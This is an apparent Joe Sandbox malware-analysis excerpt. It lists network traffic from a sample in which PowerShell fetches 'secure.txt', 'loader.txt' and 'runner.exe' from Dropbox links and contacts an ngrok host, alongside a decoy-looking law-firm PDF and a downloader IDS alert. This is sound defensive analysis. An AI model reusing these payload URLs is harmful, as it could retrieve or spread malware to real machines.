                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.com/cd/0/get/cgav6hxz-a3hqztu2stg3lhfdemnudbrioashxey3jhwylsfargumzl5s0_-flqsuct-0eeqw-wuyn6n4gefjth9u4msrz2brkz7vkhamcgku5sfmxi4aig5gyozhoblvwy5vdl2jj-0e5yl43irzetv/file?dl=1#
                      Source: Joe Sandbox ViewIP Address: 162.125.65.18 162.125.65.18
                      Source: Joe Sandbox ViewIP Address: 162.125.69.15 162.125.69.15
                      Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
                      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox ViewASN Name: IOFLOODUS IOFLOODUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 162.125.65.18:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49817 -> 162.125.65.18:443
                      Source: global trafficHTTP traffic detected: GET /api/secure/220836f7ecc9edc92da5931044d3532a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/rhdfi34kz96yn76veo4so/secure.txt?rlkey=nx60j5siilxx9ixj2w41y03ec&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stANvC5IaQBP3fC7mPeMm1aFAjpEs430k_yacr8O7cv4-xJstJ5EUF1kK7dIZABm0I0CiryF3Rfg5uP1ovIvVQ9jV8YBBSIzuSbhA0QTh5U_eTRZW6DmXHPxRcdiNyV/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/ic3qrv251eb3hefiq4cgw/loader.txt?rlkey=dhptqx5w48vzhc81an0mgw37n&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJSokD2hyVD-dcxpjXcFTByRIcbskJLZyy0o7030MuxoI7EdVmq-TNAF7rSw-K-1cAfSNrJf0Ks95n6UjNOWo3DxcvubcK30hHCRV8lh6o7N0wHaG86Cjy_nyNLs1VS/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgAV6hxZ-A3hQzTu2Stg3LHFDeMnudBRIOasHxeY3jHwYLSfARGUmzl5s0_-flqSUCT-0eeqW-WUyn6n4GefjtH9u4MSRz2brkZ7vKHaMcGku5sFmxi4aIg5GYOzhOBlVWy5vDL2jJ-0e5yl43IRZEtV/file?dl=1 HTTP/1.1Host: ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgCh17DjAot4f81U6ef-GP-6FG4okX8Og2zouwNyixm_AL2LxxJza7GzwZwN01fuHYucSY8eB_yzYhlfC1H3ZArjYrqXbVPaFd7BkA--Kny9hSL_9DMJZA6pOdQ5xxuhOyzp5h0kKcr1Wl3kKDYeO493/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgCEuRRMHdo1n8xDRYr3hdPQBokKmoupLM-SXQcxSZ-cWl3EecnBrskW3hNzDSS0t9teYsZslX3TL5iGhn0tnO_sLx5OmgiL7UPtp0drEJqD-1-Vx-gBZNlKPuQZL5ahvAUhpgetrCGvOX5CAg0RxXY9/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.8
                      Source: global trafficHTTP traffic detected: GET /api/secure/220836f7ecc9edc92da5931044d3532a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/rhdfi34kz96yn76veo4so/secure.txt?rlkey=nx60j5siilxx9ixj2w41y03ec&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBI0vZLcfIzC6_GbdoC3zuM4stANvC5IaQBP3fC7mPeMm1aFAjpEs430k_yacr8O7cv4-xJstJ5EUF1kK7dIZABm0I0CiryF3Rfg5uP1ovIvVQ9jV8YBBSIzuSbhA0QTh5U_eTRZW6DmXHPxRcdiNyV/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc810dbea1df8b85be7371a8e685.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/ic3qrv251eb3hefiq4cgw/loader.txt?rlkey=dhptqx5w48vzhc81an0mgw37n&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJSokD2hyVD-dcxpjXcFTByRIcbskJLZyy0o7030MuxoI7EdVmq-TNAF7rSw-K-1cAfSNrJf0Ks95n6UjNOWo3DxcvubcK30hHCRV8lh6o7N0wHaG86Cjy_nyNLs1VS/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgAV6hxZ-A3hQzTu2Stg3LHFDeMnudBRIOasHxeY3jHwYLSfARGUmzl5s0_-flqSUCT-0eeqW-WUyn6n4GefjtH9u4MSRz2brkZ7vKHaMcGku5sFmxi4aIg5GYOzhOBlVWy5vDL2jJ-0e5yl43IRZEtV/file?dl=1 HTTP/1.1Host: ucd17e98c22878db2872ebfcb27c.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgCh17DjAot4f81U6ef-GP-6FG4okX8Og2zouwNyixm_AL2LxxJza7GzwZwN01fuHYucSY8eB_yzYhlfC1H3ZArjYrqXbVPaFd7BkA--Kny9hSL_9DMJZA6pOdQ5xxuhOyzp5h0kKcr1Wl3kKDYeO493/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc0a94dea147da368ca578e9c165.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgCEuRRMHdo1n8xDRYr3hdPQBokKmoupLM-SXQcxSZ-cWl3EecnBrskW3hNzDSS0t9teYsZslX3TL5iGhn0tnO_sLx5OmgiL7UPtp0drEJqD-1-Vx-gBZNlKPuQZL5ahvAUhpgetrCGvOX5CAg0RxXY9/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; media-src https://* blob: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; frame-ancestors 'self' https://*.dropbox.com ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5@uPolicy: media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; font-src https://* data: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: FPolicy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; img-src https://* data: blob: ; media-src https://* blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
